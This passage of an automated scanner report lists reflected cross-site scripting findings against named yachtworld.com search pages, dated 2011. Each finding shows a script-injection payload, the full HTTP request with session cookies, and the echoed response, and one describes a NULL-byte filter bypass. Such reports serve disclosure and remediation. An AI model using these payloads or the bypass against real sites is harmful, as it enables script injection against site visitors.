boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:25:31 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boat
...[SNIP]...
68130&checked=2236801&checked=2176549&checked=2047889&checked=2197077&checked=2265142&checked=2299198&checked=2156078&checked=2277879&checked=2243382&checked=2299200&checked=2299202&url=starlingmarine.6291e"><script>alert(1)</script>0d77fcea0d6&hosturl=starlingmarine&">
...[SNIP]...

3.356. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f81d7"><script>alert(1)</script>4196143acd6 was submitted in the ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /core/listing/cache/pl_search_results.jsp?ywo=southpawf81d7"><script>alert(1)</script>4196143acd6&ps=50&type=&new=&luom=126&hosturl=southpaw&page=broker&slim=broker&lineonly HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:26:44 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/southpaw/boats.head
...[SNIP]...
<a href="pl_search_results.jsp?slim=broker&hosturl=southpaw&units=Feet&&cit=true&url=southpaw&&hosturl=southpaw&&ywo=southpawf81d7"><script>alert(1)</script>4196143acd6&&lineonly&&type=%28Power%29">
...[SNIP]...

3.357. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b8f4"><script>alert(1)</script>b0089275f4c was submitted in the ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/pl_search_results.jsp?ywo=starlingmarine5b8f4"><script>alert(1)</script>b0089275f4c&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:26 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 12394

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boat
...[SNIP]...
<a href="pl_search_results.jsp?slim=broker&hosturl=starlingmarine&units=Feet&&cit=true&url=starlingmarine&&hosturl=starlingmarine&&ywo=starlingmarine5b8f4"><script>alert(1)</script>b0089275f4c&&lineonly&&type=%28Power%29">
...[SNIP]...

3.358. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the N request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 737a0'%3balert(1)//26b9376415 was submitted in the N parameter. This input was echoed as 737a0';alert(1)//26b9376415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /core/listing/cache/searchResults.jsp?fromYear=2004&searchtype=homepage&Ntk=boatsEN&sm=3&toLength=32&cit=true&luom=126&currencyid=100&fromPrice=0&fromLength=24&man=regulator&slim=quick&N=3941737a0'%3balert(1)//26b9376415&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 22:09:27 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "3941737a0';alert(1)//26b9376415"<br>
...[SNIP]...

3.359. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the N request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b05'%3balert(1)//5eb043fe571 was submitted in the N parameter. This input was echoed as a4b05';alert(1)//5eb043fe571 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3&hmid=0&ftid=0&enid=0&currencyid=100&luom=126&N=2280a4b05'%3balert(1)//5eb043fe571&searchtype=topmenu HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:07:06 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "2280a4b05';alert(1)//5eb043fe571"<br>
...[SNIP]...

3.360. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [No parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the No request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58b65'%3balert(1)//c6b76bbd859 was submitted in the No parameter. This input was echoed as 58b65';alert(1)//c6b76bbd859 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=1058b65'%3balert(1)//c6b76bbd859 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; 